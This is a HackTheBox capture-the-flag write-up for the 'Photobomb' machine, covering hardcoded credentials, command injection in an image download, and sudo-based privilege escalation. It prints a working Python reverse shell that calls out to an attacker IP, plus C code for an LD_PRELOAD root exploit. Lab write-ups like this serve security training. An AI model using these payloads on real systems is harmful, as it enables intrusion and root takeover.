Photobomb HackTheBox Writeup

11 February 2023 - 2 mins read time
Tags: hackthebox find linux ld_preload setenv command-injection sinatra

Scanning

We launch nmap tool with scripts and versions on all ports.

We see that nmap shows us the domain “photobomb.htb”, so we include it in our “/etc/hosts” file.

Enumeration

We access the website:

If we try to access the link, we are asked for access credentials:

We review the source code, find the file “photobomb.js” and inside it some hardcoded credentials:

We enter the credentials, see that they work and it takes us to a kind of image gallery.

The machine is slow, I don’t know if it’s like that, but fuzzing is not the best ally in this occasion, I tried to put a slash “/printer/” and I saw that it returned an error where it tried to load an image in an internal port and to the directory “__sinatra__”:

Exploitation

From the name of the machine, I assumed that the entry point or vulnerability would have to be in the one thing it had, downloading images.

As we saw before, it makes a GET to download the photo, so even if we see the code, we could try to escape and execute malicious code..

Request:

Command injection request:

Since I was able to inject a command, I tried several reverse shells, but this was the only one that worked.

Reverse shell:

 export RHOST="10.10.14.13";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'  

We gain access to the machine, enumerate the user and read the user flag:

Privilege Escalation

We do a “sudo -l” and list that we can run as root the script “/opt/cleanup.sh”.

We see that SETENV does not require a password, this can be exploited with “LD_Preload” by injecting it next to the script and getting it to run with the internal find:

Exploit code:

 #include <stdio.h>  
 #include <sys/types.h>  
 #include <stdlib.h>  
 void _init() {  
 unsetenv("LD_PRELOAD");  
 setgid(0);  
 setuid(0);  
 system("/bin/sh");  
 }  

We download the file “exploit.so” in temporary and run it together with the script with SUDO, we see that we escalate privileges to root and read the flag.